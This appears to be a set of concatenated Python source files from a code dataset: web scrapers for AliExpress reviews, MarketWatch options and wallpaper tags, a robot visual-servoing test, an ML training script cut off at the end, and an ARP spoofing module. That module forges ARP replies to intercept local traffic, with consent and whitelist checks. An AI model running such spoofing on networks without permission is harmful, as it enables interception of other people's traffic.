data = resp.json()\n total_page = data['totalPage']\n total_page = min([total_page, max_page])\n reviews += data['evaViewList']\n\n if total_page > 1:\n next_page = 2\n while next_page <= total_page:\n print('{}\\t{}/{}'.format(product_id, next_page, total_page))\n next_url = url_template.format(next_page, product_id)\n resp = s.get(next_url)\n\n next_page += 1\n\n try:\n data = resp.json()\n except Exception:\n continue\n\n reviews += data['evaViewList']\n\n filtered_reviews = []\n for review in reviews:\n data = {\n 'product_id': product_id,\n 'anonymous': review['anonymous'],\n 'buyercountry': review['buyerCountry'],\n 'buyereval': review['buyerEval'],\n 'buyerfeedback': review['buyerFeedback'],\n 'buyergender': review['buyerGender'] if 'buyerGender' in review else '',\n 'buyerHeadPortrait': 
review['buyerHeadPortrait'] if 'buyerHeadPortrait' in review else '',\n 'buyerid': review['buyerId'] if 'buyerId' in review else '',\n 'buyername': review['buyerName'] if 'buyerName' in review else '',\n 'evaldate': review['evalDate'],\n 'image': review['images'][0] if 'images' in review and len(review['images']) > 0 else '',\n 'logistics': review['logistics'] if 'logistics' in review else '',\n 'skuInfo': review['skuInfo'] if 'skuInfo' in review else '',\n 'thumbnail': review['thumbnails'][0] if 'thumbnails' in review and len(review['thumbnails']) > 0 else '',\n }\n filtered_reviews.append(data)\n\n product_reviews = pd.DataFrame(filtered_reviews)\n print(product_reviews.shape)\n english_product_reviews = find_english(product_reviews)\n print(english_product_reviews.shape)\n english_product_reviews_with_prob = find_helpful(english_product_reviews)\n print(english_product_reviews_with_prob.shape)\n return english_product_reviews_with_prob\n\ndef get_product_reviews(product_info):\n product_id = product_info['product_id']\n dirpath = os.getcwd()\n reviews_filename = os.path.join(dirpath,'Trust_Express_Site','data', 'smaller_pretrained_aliexpress_reviews.csv')\n review_df = pd.read_csv(reviews_filename, index_col=False, low_memory=False)\n product_reviews = review_df.loc[pd.to_numeric(review_df['product_id'], errors = 'coerce')==product_id]\n return product_reviews\n\ndef rate_my_product(product_reviews):\n number_reviews = product_reviews['buyerid'].count()\n helpful_only = product_reviews.loc[product_reviews['help_prob']>.5]\n number_helpful= helpful_only['buyerid'].count()\n helpful_only_rating = pd.to_numeric(helpful_only['buyereval']).mean()/20\n product_ratings = {\n 'number_english':number_reviews,\n 'number_helpful':number_helpful,\n 'helpful_only_rating':helpful_only_rating,\n }\n return product_ratings\n\ndef get_top_reviews(product_reviews):\n helpful_sorted = product_reviews.sort_values(by='help_prob',ascending=False)\n helpful_sorted['buyereval']=pd.to_numeric(helpful_sorted['buyereval'], errors='coerce')\n top_reviews_list = []\n top_review_1 = {\n 'buyerfeedback' : helpful_sorted.iloc[0]['buyerfeedback'],\n 'help_prob':helpful_sorted.iloc[0]['help_prob']*100,\n 'buyereval':helpful_sorted.iloc[0]['buyereval']\n }\n top_reviews_list.append(top_review_1)\n top_review_2 = {\n 'buyerfeedback' : helpful_sorted.iloc[1]['buyerfeedback'],\n 'help_prob':helpful_sorted.iloc[1]['help_prob']*100,\n 'buyereval':helpful_sorted.iloc[1]['buyereval']\n }\n top_reviews_list.append(top_review_2)\n \n if helpful_sorted.buyereval.min() < 60:\n negative_reviews = helpful_sorted.loc[helpful_sorted['buyereval']<60]\n else:\n negative_reviews = helpful_sorted.loc[helpful_sorted['buyereval']==helpful_sorted.buyereval.min()]\n \n negative_review_1 = {\n 'buyerfeedback' : negative_reviews.iloc[0]['buyerfeedback'],\n 'help_prob':negative_reviews.iloc[0]['help_prob']*100,\n 'buyereval':negative_reviews.iloc[0]['buyereval']\n }\n top_reviews_list.append(negative_review_1)\n \n top_reviews = pd.DataFrame(top_reviews_list)\n \n return top_reviews\n\nif __name__ == '__main__':\n # Test the functions\n link = 
'https://www.aliexpress.com/item/100pcs-bag-10mm-wholesale-silver-Plating-metal-Jump-Rings-Loop-Finding/1082836270.html?ws_ab_test=searchweb0_0,searchweb201602_3_10065_10068_10130_10547_10546_10059_10548_315_10545_10696_100031_5017615_531_10084_10083_10103_451_10618_452_10307_5017715,searchweb201603_55,ppcSwitch_3&algo_expid=89c3c219-2c61-4ec5-a633-13e752a31ec8-41&algo_pvid=89c3c219-2c61-4ec5-a633-13e752a31ec8&transAbTest=ae803_2&priceBeautifyAB=0'\n product_info = get_product_info(link)\n print(product_info['product_id'])\n product_reviews = get_product_reviews(product_info)\n print(product_reviews.iloc[0]['buyerid'])\n product_ratings=rate_my_product(product_reviews)\n print(product_ratings)\n \n link_2 = 'https://www.aliexpress.com/store/product/2017-Women-Summer-Casual-Cotton-Linen-V-neck-short-sleeve-tops-shorts-two-piece-set-Female/2056007_32808779921.html?spm=2114.search0103.3.56.503d1b09JWn3Kc&ws_ab_test=searchweb0_0,searchweb201602_5_10065_10068_10130_10547_10546_10059_10884_10548_315_10545_10887_10696_100031_10084_531_10083_10103_10618_10307_449,searchweb201603_60,ppcSwitch_7&algo_expid=69625d3c-df51-43ba-8dbf-232180987a7d-7&algo_pvid=69625d3c-df51-43ba-8dbf-232180987a7d&priceBeautifyAB=0'\n product_info = scrape_product_info(link_2)\n print(product_info['product_id'])\n product_reviews = extract_product_reviews(product_info['product_id'])\n print(product_reviews.iloc[0]['buyerid'])\n \n ","sub_path":"flaskapp/Trust_Express_Site/trust_utils_4.py","file_name":"trust_utils_4.py","file_ext":"py","file_size_in_byte":13676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"623610618","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.linalg as LA\nimport math\nfrom math import sin, cos\nfrom util_visual_servoing import get_train_test_scenes, get_mapper, detect_correspondences, get_mapper_scene2points, create_folder, get_mapper_dist_theta_heading, get_pose_from_name, sample_gt_correspondences_with_large_displacement, build_L_matrix, compute_velocity_through_correspondences_and_depth, goToPose_one_step\nimport glob\nimport sys\nimport os, inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0,parentdir)\nsys.path.append('/home/reza/Datasets/GibsonEnv/my_code/rrt')\nsys.path.append('/home/reza/Datasets/GibsonEnv/my_code/CVPR_workshop')\nimport rrt\nimport random\nfrom math import cos, sin, pi\nfrom util import action2pose, func_pose2posAndorn, similar_location_under_certainThreshold, plus_theta_fn, minus_theta_fn\n\nnp.set_printoptions(precision=2, suppress=True)\nperception_rep = 'gtSparse' # 'gtDense', 'learnedSparse', 'sift'\ndepth_method = 'gt' # 'estimated', 'void'\n\ndef main(scene_idx=0):\n\n\t#scene_idx = 0\n\n\tmapper_scene2z = get_mapper()\n\tmapper_scene2points = get_mapper_scene2points()\n\tTrain_Scenes, Test_Scenes = get_train_test_scenes()\n\tscene_name = Test_Scenes[scene_idx]\n\tnum_startPoints = len(mapper_scene2points[scene_name])\n\tnum_steps = 35\n\n\t## create test folder\n\ttest_folder = '/home/reza/Datasets/GibsonEnv/my_code/visual_servoing/test_IBVS'\n\t#approach_folder = '{}/gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY'.format(test_folder)\n\t#create_folder(approach_folder)\n\n\t#scene_folder = '{}/{}'.format(approach_folder, scene_name)\n\t#create_folder(scene_folder)\n\n\tf = open('{}/{}_{}.txt'.format(test_folder, perception_rep, depth_method), 
'a')\n\tf.write('scene_name = {}\\n'.format(scene_name))\n\tlist_count_correct = []\n\tlist_count_runs = []\n\tlist_count_steps = []\n\n\t## rrt functions\n\t## first figure out how to sample points from rrt graph\n\trrt_directory = '/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt'.format(scene_name)\n\tpath_finder = rrt.PathFinder(rrt_directory)\n\tpath_finder.load()\n\tnum_nodes = len(path_finder.nodes_x)\n\tfree = cv2.imread('/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt/free.png'.format(scene_name), 0)\n\n\t## GibsonEnv setup\n\t## For Gibson Env\n\timport gym, logging\n\tfrom mpi4py import MPI\n\tfrom gibson.envs.husky_env import HuskyNavigateEnv\n\tfrom baselines import logger\n\timport skimage.io\n\tfrom transforms3d.euler import euler2quat\n\tconfig_file = os.path.join('/home/reza/Datasets/GibsonEnv/my_code/CVPR_workshop', 'env_yamls', '{}_navigate.yaml'.format(scene_name))\n\tenv = HuskyNavigateEnv(config=config_file, gpu_count = 1)\n\tobs = env.reset() ## this line is important otherwise there will be an error like 'AttributeError: 'HuskyNavigateEnv' object has no attribute 'potential''\n\n\tdef get_obs(current_pose):\n\t\tpos, orn = func_pose2posAndorn(current_pose, mapper_scene2z[scene_name])\n\t\tenv.robot.reset_new_pose(pos, orn)\n\t\tobs, _, _, _ = env.step(4)\n\t\tobs_rgb = obs['rgb_filled']\n\t\tobs_depth = obs['depth']\n\t\treturn obs_rgb.copy(), obs_depth.copy()\n\n\tbase_folder = '/home/reza/Datasets/GibsonEnv/my_code/visual_servoing/sample_image_pairs_{}'.format('test')\n\n\n\n\t## go through each point folder\n\tfor point_idx in range(0, num_startPoints):\n\t#for point_idx in range(0, 1):\n\t\tprint('point_idx = {}'.format(point_idx))\n\n\t\t#point_folder = '{}/point_{}'.format(scene_folder, point_idx)\n\t\t#create_folder(point_folder)\n\n\t\t## read in start img and start pose\n\t\tpoint_image_folder = '{}/{}/point_{}'.format(base_folder, scene_name, point_idx)\n\t\tpoint_pose_npy_file = np.load('{}/{}/point_{}_poses.npy'.format(base_folder, scene_name, point_idx))\n\n\t\tstart_img = cv2.imread('{}/{}.png'.format(point_image_folder, point_pose_npy_file[0]['img_name']))[:, :, ::-1]\n\t\tstart_pose = point_pose_npy_file[0]['pose']\n\n\t\t## index 0 is the left image, so right_img_idx starts from index 1\n\t\tcount_correct = 0\n\t\tlist_correct_img_names = []\n\t\tlist_whole_stat = []\n\t\tlist_steps = []\n\n\t\tfor right_img_idx in range(1, len(point_pose_npy_file)):\n\t\t#for right_img_idx in range(10, 11):\n\t\t\tflag_correct = False\n\t\t\tprint('right_img_idx = {}'.format(right_img_idx))\n\n\t\t\tcount_steps = 0\n\n\t\t\tcurrent_pose = start_pose\n\t\t\t\n\t\t\tright_img_name = point_pose_npy_file[right_img_idx]['img_name']\n\t\t\tgoal_pose = point_pose_npy_file[right_img_idx]['pose']\n\t\t\tgoal_img, goal_depth = get_obs(goal_pose)\n\n\t\t\tlist_result_poses = [current_pose]\n\t\t\tnum_matches = 0\n\t\t\tflag_broken = False\n\t\t\twhile count_steps < num_steps:\n\t\t\t\tcurrent_img, current_depth = get_obs(current_pose)\n\t\t\t\ttry:\n\t\t\t\t\tkp1, kp2 = sample_gt_correspondences_with_large_displacement(current_depth, goal_depth, current_pose, goal_pose)\n\t\t\t\t\tif count_steps == 0:\n\t\t\t\t\t\tstart_depth = current_depth.copy()\n\t\t\t\texcept:\n\t\t\t\t\tprint('run into error')\n\t\t\t\t\tbreak\n\t\t\t\tnum_matches = kp1.shape[1]\n\n\t\t\t\tvx, vz, omegay, flag_stop = compute_velocity_through_correspondences_and_depth(kp1, kp2, current_depth)\n\n\t\t\t\tprevious_pose = current_pose\n\t\t\t\tcurrent_pose, _, _, 
flag_stop_goToPose = goToPose_one_step(current_pose, vx, vz, omegay)\n\n\t\t\t\t## check if there is collision during the action\n\t\t\t\tleft_pixel = path_finder.point_to_pixel((previous_pose[0], previous_pose[1]))\n\t\t\t\tright_pixel = path_finder.point_to_pixel((current_pose[0], current_pose[1]))\n\t\t\t\t# rrt.line_check returns True when there is no obstacle\n\t\t\t\tif not rrt.line_check(left_pixel, right_pixel, free):\n\t\t\t\t\tflag_broken = True\n\t\t\t\t\t#print('run into an obstacle ...')\n\t\t\t\t\tbreak\n\n\t\t\t\t## check if we should stop or not\n\t\t\t\tif flag_stop or flag_stop_goToPose:\n\t\t\t\t\t#print('flag_stop = {}, flag_stop_goToPose = {}'.format(flag_stop, flag_stop_goToPose))\n\t\t\t\t\t#print('break')\n\t\t\t\t\tbreak\n\n\t\t\t\tcount_steps += 1\n\t\t\t\tlist_result_poses.append(current_pose)\n\t\t\t\t## sample current_img again to save in list_obs\n\t\t\t\tcurrent_img, current_depth = get_obs(current_pose)\n\t\t\t#assert 1==2\n\t\t\t## decide if this run is successful or not\n\t\t\tflag_correct, dist, theta_change = similar_location_under_certainThreshold(goal_pose, list_result_poses[count_steps])\n\t\t\t#print('dist = {}, theta = {}'.format(dist, theta_change))\n\t\t\t#print('start_pose = {}, final_pose = {}, goal_pose = {}'.format(start_pose, list_result_poses[-1], goal_pose))\n\t\t\tif flag_correct:\n\t\t\t\tcount_correct += 1\n\t\t\t\tlist_correct_img_names.append(right_img_name[10:])\n\n\t\t\tif flag_correct: \n\t\t\t\tstr_succ = 'Success'\n\t\t\t\tprint('str_succ = {}'.format(str_succ))\n\t\t\telse:\n\t\t\t\tstr_succ = 'Failure'\n\t\t\t\tprint('str_succ = {}'.format(str_succ))\n\n\t\t\tlist_steps.append(len(list_result_poses))\n\t\t\t## ===================================================================================================================\n\t\t\t## plot the pose graph\n\t\t\t'''\n\t\t\timg_name = 'goTo_{}.jpg'.format(right_img_name[10:])\n\t\t\tprint('img_name = {}'.format(img_name))\n\n\t\t\t## plot the poses\n\t\t\tfree2 = cv2.imread('/home/reza/Datasets/GibsonEnv/gibson/assets/dataset/{}_for_rrt/free.png'.format(scene_name), 1)\n\t\t\trows, cols, _ = free2.shape\n\t\t\tplt.imshow(free2)\n\n\t\t\tfor m in range(len(list_result_poses)):\n\t\t\t\tpose = list_result_poses[m]\n\t\t\t\tx, y = path_finder.point_to_pixel((pose[0], pose[1]))\n\t\t\t\ttheta = pose[2]\n\t\t\t\tplt.arrow(x, y, cos(theta), sin(theta), color='y', \\\n\t\t\t\t\toverhang=1, head_width=0.1, head_length=0.15, width=0.001)\n\t\t\t## draw goal pose\n\t\t\tx, y = path_finder.point_to_pixel((goal_pose[0], goal_pose[1]))\n\t\t\ttheta = goal_pose[2]\n\t\t\tplt.arrow(x, y, cos(theta), sin(theta), color='r', \\\n\t\t\t\t\toverhang=1, head_width=0.1, head_length=0.15, width=0.001)\n\n\t\t\tplt.axis([0, cols, 0, rows])\n\t\t\tplt.xticks([])\n\t\t\tplt.yticks([])\n\t\t\tplt.title('{}, start point_{}, goal viewpoint {}, {}\\n dist = {:.4f} meter, theta = {:.4f} degree\\n'.format(scene_name, point_idx, right_img_name[10:], str_succ, dist, theta_change))\n\t\t\tplt.savefig('{}/{}'.format(point_folder, img_name), bbox_inches='tight', dpi=(400))\n\t\t\tplt.close()\n\n\t\t\t## ======================================================================================================================\n\t\t\t## save stats\n\t\t\tcurrent_test_dict = {}\n\t\t\tcurrent_test_dict['img_name'] = right_img_name\n\t\t\tcurrent_test_dict['success_flag'] = flag_correct\n\t\t\tcurrent_test_dict['dist'] = dist\n\t\t\tcurrent_test_dict['theta'] = theta_change\n\t\t\tcurrent_test_dict['steps'] = 
count_steps\n\t\t\tcurrent_test_dict['collision'] = flag_broken\n\n\t\t\tlist_whole_stat.append(current_test_dict)\n\t\t\t'''\n\n\t\t'''\n\t\tnp.save('{}/runs_statistics.npy'.format(point_folder), list_whole_stat)\n\n\t\tsuccess_rate = 1.0 * count_correct / (len(point_pose_npy_file)-1)\n\t\tprint('count_correct/num_right_images = {}/{} = {}'.format(count_correct, len(point_pose_npy_file)-1, success_rate))\n\n\t\t## write correctly run target image names to file\n\t\tf = open('{}/successful_runs.txt'.format(point_folder), 'w')\n\t\tf.write('count_correct/num_right_images = {}/{} = {}\\n'.format(count_correct, len(point_pose_npy_file)-1, success_rate))\n\t\tfor i in range(len(list_correct_img_names)):\n\t\t\tf.write('{}\\n'.format(list_correct_img_names[i]))\n\t\tf.close()\n\t\tprint('writing correct run image names to txt ...')\n\t\t'''\n\t\tavg_steps = 1.0 * sum(list_steps) / len(list_steps)\n\t\tf.write('point {} : {}/{}, {}\\n'.format(point_idx, count_correct, len(point_pose_npy_file)-1, avg_steps))\n\t\tlist_count_correct.append(count_correct)\n\t\tlist_count_runs.append(len(point_pose_npy_file)-1)\n\t\tlist_count_steps.append(avg_steps)\n\t\tf.flush()\n\n\tavg_count_steps = 1.0 * sum(list_count_steps) / len(list_count_steps)\n\tf.write('In total : {}/{}, {}\\n'.format(sum(list_count_correct), sum(list_count_runs), avg_count_steps))\n\tf.write('-------------------------------------------------------------------------------------\\n')\t\n\n#'''\nif __name__ == \"__main__\":\t\n\timport argparse\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--scene_idx', type=int, default=0)\n\targs = parser.parse_args()\n\tmain(args.scene_idx)\n#'''","sub_path":"visual_servoing/test_IBVS_gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY.py","file_name":"test_IBVS_gtCorrespondence_interMatrix_gtDepth_Vz_OmegaY.py","file_ext":"py","file_size_in_byte":9956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"90122333","text":"\ndef marketwatchOptionChain(ticker):\n\turl = 'https://www.marketwatch.com/investing/stock/{}/options?countrycode=US&showAll=True'.format(ticker.lower())\n\timport requests\n\tfrom bs4 import BeautifulSoup\n\n\tdata = requests.get(url).text\n\thtml = BeautifulSoup(data, 'lxml')\n\tchain = html.find('table', class_='optiontable eightwide')\n\n\tcalls, puts = [], []\n\toptiontable = chain.find_all('tr')\n\theaderExists, currentExpiry, colnHeaders = False, None, None\n\n\tfor row in optiontable:\n\t\tcols = row.find_all('td')\n\t\tcols = [elem.text.strip() for elem in cols]\n\t\texcludeEmpty = [elem for elem in cols if elem] # Get rid of empty values\n\n\t\tif \"Symbol\" in excludeEmpty[0]:\n\t\t\tif (not headerExists):\n\t\t\t\tcolnHeaders = [elem for elem in excludeEmpty if elem != \"Symbol\"]\n\t\t\t\tcolnHeaders = colnHeaders[0:6]\n\t\t\t\tcolnHeaders.insert(0, \"Expiry\")\n\t\t\t\tcolnHeaders.insert(1, \"Strike\")\n\t\t\t\theaderExists = True\n\n\t\tif \"Expires\" in excludeEmpty[0]:\n\t\t\tcurrentExpiry = excludeEmpty[0][7:].strip()\n\t\telif \"quote\" in excludeEmpty[0]:\n\t\t\texcludeQuote = [elem for elem in excludeEmpty if elem != \"quote\"]\n\t\t\tdata = (currentExpiry, *excludeQuote)\n\t\t\tcalls.append((data[0], data[7], *data[1:7]))\n\t\t\tputs.append((data[0], data[7], *data[8:]))\n\n\timport pandas as pd\n\tcallsDF = pd.DataFrame(calls, columns=colnHeaders)\n\tputsDF = pd.DataFrame(puts, columns=colnHeaders)\n\treturn callsDF, 
putsDF\n","sub_path":"Algotrading/Arrow/DelayedOptionsChain.py","file_name":"DelayedOptionsChain.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"372699035","text":"import os\n\nimport matplotlib.pyplot as plt\nimport pandas\nimport requests\nimport requests.exceptions\nfrom bs4 import BeautifulSoup\n\n\ndef get_image_ids():\n    \"\"\"\n    Get the ids of all images in the current directory\n    :return: image_ids\n    \"\"\"\n    image_ids = []\n    for file_name in os.listdir('./'):\n        try:\n            image_id_str = file_name.split('-')[1].split('.')[0]\n            image_id = int(image_id_str)\n            image_ids.append(image_id)\n        except IndexError:\n            continue\n        except ValueError:\n            continue\n    image_ids.sort()\n    return image_ids\n\n\ndef get_image_detail_urls(image_ids):\n    \"\"\"\n    Build the image detail urls\n    :param image_ids: image_ids\n    :return: image_detail_urls\n    \"\"\"\n    image_detail_url_tmp = 'https://alpha.wallhaven.cc/wallpaper/{0}'\n    image_detail_urls = []\n    for image_id in image_ids:\n        image_detail_url = image_detail_url_tmp.format(image_id)\n        image_detail_urls.append(image_detail_url)\n        print('image_detail_urls.append {0}'.format(image_detail_url))\n    return image_detail_urls\n\n\ndef get_image_tag_list(image_url):\n    \"\"\"\n    Get the tag list of an image\n    :param image_url: image_url\n    :return: tag_list\n    \"\"\"\n    print('GET {0}'.format(image_url))\n    response = requests.get(image_url, timeout=10)\n    soup = BeautifulSoup(response.text, 'html.parser')\n    img_tag = soup.find('img', id='wallpaper')\n    tag_list = img_tag['alt'].split(' ')[2:]\n    return tag_list\n\n\ndef get_image_tag_dict(image_urls):\n    \"\"\"\n    Build the tag dictionary, counting how often each tag occurs\n    :param image_urls: image_urls\n    :return: image_tag_dict\n    \"\"\"\n    tag_dict = dict()\n    for image_url in image_urls:\n        try:\n            image_tag_list = get_image_tag_list(image_url)\n        except requests.exceptions.ReadTimeout:\n            continue\n        except TypeError:\n            continue\n        for image_tag in image_tag_list:\n            data = tag_dict.get(image_tag, 0)\n            data += 1\n            tag_dict[image_tag] = data\n    return tag_dict\n\n\ndef get_sorted_data_frame(tag_dict):\n    \"\"\"\n    Return a DataFrame of (tag, count) rows sorted by count\n    :param tag_dict: tag_dict\n    :return: sorted DataFrame\n    \"\"\"\n    # build explicit (tag, count) rows; wrapping the dict in a list would yield\n    # NaN 'Tag'/'Count' columns, because the dict keys would become the column names\n    tag_data_list = list(tag_dict.items())\n    df = pandas.DataFrame(tag_data_list, columns=['Tag', 'Count'])\n    df.sort_values('Count', ascending=False, inplace=True)\n    return df\n
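\n\n# Rough usage sketch (illustrative values, not in the original script):\n#   get_sorted_data_frame({'anime': 3, 'landscape': 5}) -> first row is ('landscape', 5)\n\n\ndef save_data_image_top20(data, labels):\n    \"\"\"\n    Generate the top-20 tag pie chart\n    :param data: data values\n    :param labels: tag names\n    \"\"\"\n    plt.pie(data, labels=labels)\n    plt.savefig('tag-top-20.png')\n    print('Top 20 pie chart generated')\n\n\nif __name__ == '__main__':\n    image_ids = get_image_ids()\n    print('Detected {0} images in total'.format(len(image_ids)))\n    image_detail_urls = get_image_detail_urls(image_ids)\n    tag_dict = get_image_tag_dict(image_detail_urls)\n    data_frame = get_sorted_data_frame(tag_dict)\n    data_frame.to_csv('tag_data.csv')\n    save_data_image_top20([data for data in data_frame['Count']][:20], [tag for tag in data_frame['Tag']][:20])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"251764953","text":"\"\"\"\nBased on ARP packets received, sends out spoofed ARP packets.\n\n\"\"\"\nfrom host_state import HostState\nimport scapy.all as sc\nimport threading\nimport utils\nimport time\n\n\n# Min seconds between successive spoofed packets\nMIN_ARP_SPOOF_INTERVAL = 0.01\n\n\nclass ArpSpoof(object):\n\n    def __init__(self, host_state):\n\n        assert isinstance(host_state, HostState)\n        self._host_state = host_state\n\n        self._lock = 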
threading.Lock()\n self._active = True\n self._thread = threading.Thread(target=self._arp_spoof_loop)\n self._thread.daemon = True\n\n def start(self):\n\n with self._lock:\n self._active = True\n\n utils.log('[Arp Spoof] Starting.')\n self._thread.start()\n\n def _arp_spoof_loop(self):\n\n prev_ip_mac_dict = None\n\n while True:\n\n if not self._host_state.is_inspecting():\n time.sleep(2)\n continue\n\n time.sleep(1)\n\n with self._lock:\n if not self._active:\n return\n\n with self._host_state.lock:\n if not self._host_state.has_consent:\n utils.log('[ARP Spoof] No consent; no spoofing.')\n continue\n\n # Get ARP cache\n ip_mac_dict = self._host_state.get_ip_mac_dict_copy()\n gateway_ip = self._host_state.gateway_ip\n\n if str(ip_mac_dict) != str(prev_ip_mac_dict):\n\n prev_ip_mac_dict = ip_mac_dict\n\n utils.log('[ARP Spoof] Cache:', ip_mac_dict)\n utils.log(\n '[ARP Spoof] Whitelist:', self._host_state.device_whitelist\n )\n\n # Get gateway MAC addr\n try:\n gateway_mac = ip_mac_dict[gateway_ip]\n except KeyError:\n continue\n\n # Spoof individual devices on the network.\n for (victim_ip, victim_mac) in ip_mac_dict.items():\n\n if victim_ip == gateway_ip:\n continue\n\n # Check against whitelist.\n victim_device_id = \\\n utils.get_device_id(victim_mac, self._host_state)\n if victim_device_id not in self._host_state.device_whitelist:\n utils.log('[ARP Spoof] Ignore:', victim_ip, victim_mac)\n continue\n\n if utils.TEST_OUI_LIST:\n victim_mac_oui = utils.get_oui(victim_mac)\n if victim_mac_oui not in utils.TEST_OUI_LIST:\n continue\n\n utils.safe_run(\n self._arp_spoof,\n args=(victim_mac, victim_ip, gateway_mac, gateway_ip)\n )\n\n with self._lock:\n if not self._active:\n return\n\n time.sleep(max(MIN_ARP_SPOOF_INTERVAL, 2.0 / len(ip_mac_dict)))\n\n def _arp_spoof(self, victim_mac, victim_ip, gateway_mac, gateway_ip):\n \"\"\"Sends out spoofed packets for a single target.\"\"\"\n\n with self._host_state.lock:\n spoof_arp = self._host_state.spoof_arp\n\n gateway_arp = sc.ARP()\n gateway_arp.op = 2\n gateway_arp.psrc = victim_ip\n gateway_arp.hwdst = gateway_mac\n gateway_arp.pdst = gateway_ip\n if not spoof_arp:\n gateway_arp.hwsrc = victim_mac\n utils.log('[Arp Spoof] Restoring', victim_ip, '->', gateway_ip)\n\n victim_arp = sc.ARP()\n victim_arp.op = 2\n victim_arp.psrc = gateway_ip\n victim_arp.hwdst = victim_mac\n victim_arp.pdst = victim_ip\n if not spoof_arp:\n victim_arp.hwsrc = gateway_mac\n utils.log('[Arp Spoof] Restoring', gateway_ip, '->', victim_ip)\n\n sc.send(victim_arp, verbose=0)\n sc.send(gateway_arp, verbose=0)\n\n def stop(self):\n\n utils.log('[Arp Spoof] Stopping.')\n\n with self._lock:\n self._active = False\n\n self._thread.join()\n\n utils.log('[Arp Spoof] Stopped.')\n","sub_path":"v2-src/arp_spoof.py","file_name":"arp_spoof.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"87290671","text":"import sys\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.ensemble import AdaBoostClassifier\nimport 
pickle\nnltk.download(['punkt', 'wordnet'])\n\n\ndef load_data(database_filepath):\n \"\"\"\n Function to load the necessary data from the cleaned database created with the process_data.py script.\n The features (x), target variables (y) and category names (category_names) will be returned\n\n Parameters\n ----------\n database_filepath: str\n path of the database file with the cleaned data\n\n Returns\n -------\n x:object\n dataframe with the features\n y:object\n dataframe with the target variables\n category_names:object\n dataframe with the target names\n\n \"\"\"\n\n engine = create_engine('sqlite:///' + database_filepath)\n query = 'SELECT * FROM DisasterResponse;'\n df = pd.read_sql_query(query, engine)\n\n x = df[\"message\"]\n y = df.drop(['id', 'message', 'original', 'genre'], axis=1)\n\n return x, y, y.columns\n\n\ndef tokenize(text):\n \"\"\"\n Function to case normalize, lemmatize, and tokenize text using nltk\n This function is then used in the machine learning pipeline to vectorize and then apply TF-IDF to the text\n\n Parameters\n ----------\n text:object\n text data with the raw messages that will be processed\n\n Returns\n -------\n clean_tokens:object\n text data tokenized, processed and ready to be used for the machine learning pipeline\n \"\"\"\n\n # tokenize text\n tokens = word_tokenize(text)\n\n # initiate lemmatizer\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\ndef build_model():\n \"\"\"\n Function to build a pipeline that processes text and then performs multi-output classification on the 36\n categories in the dataset. GridSearchCV is used to find the best parameters for the model.\n\n Parameters\n ----------\n\n Returns\n -------\n cv:object\n machine learning model to be trained using GridSearchCV\n \"\"\"\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(AdaBoostClassifier()))\n ])\n\n parameters = {'tfidf__use_idf': [True, False],\n 'clf__estimator__n_estimators': [100, 200, 300],\n 'clf__estimator__learning_rate': [0.8, 1]}\n\n cv = GridSearchCV(pipeline, param_grid=parameters, return_train_score=True, verbose=2, n_jobs=-1)\n\n return cv\n\n\ndef evaluate_model(model, X_test, Y_test, category_names):\n \"\"\"\n Function to print the f1 score, precision and recall for the test set for each category\n\n Parameters\n ----------\n model:object\n machine learning model built with the build_model function\n X_test:object\n dataframe with the features\n Y_test:object\n dataframe with the target variables\n category_names:object\n dataframe with the target names\n\n Returns\n -------\n Prints the f1 score, precision and recall for the test set for each category\n The accuracy for each category is also printed\n \"\"\"\n\n Y_pred = model.predict(X_test)\n\n for i, col in enumerate(Y_test):\n print(col)\n print(classification_report(Y_test[col], Y_pred[:, i]))\n\n print(\"Accuracy scores for each category\\n\")\n for i in range(36):\n print(\"Accuracy score for \" + Y_test.columns[i], accuracy_score(Y_test.values[:, i], Y_pred[:, i]))\n\n\ndef save_model(model, model_filepath):\n \"\"\"\n Function to store the classifier into a pickle file to the specified model file path.\n\n Parameters\n ----------\n model:object\n machine learning model built with the build_model function\n model_filepath:str\n path of the pickle file where the classifier will be stored\n Returns\n -------\n Pickle file\n \"\"\"\n\n # honor the model_filepath argument instead of hard-coding a file name\n with open(model_filepath, 'wb') as model_file:\n pickle.dump(model, model_file)\n\n\ndef main():\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, Y, category_names = load_data(database_filepath)\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)\n\n print('Building model...')\n model = build_model()\n\n print('Training model...')\n model.fit(X_train, Y_train)\n\n print('Evaluating model...')\n evaluate_model(model, X_test, Y_test, 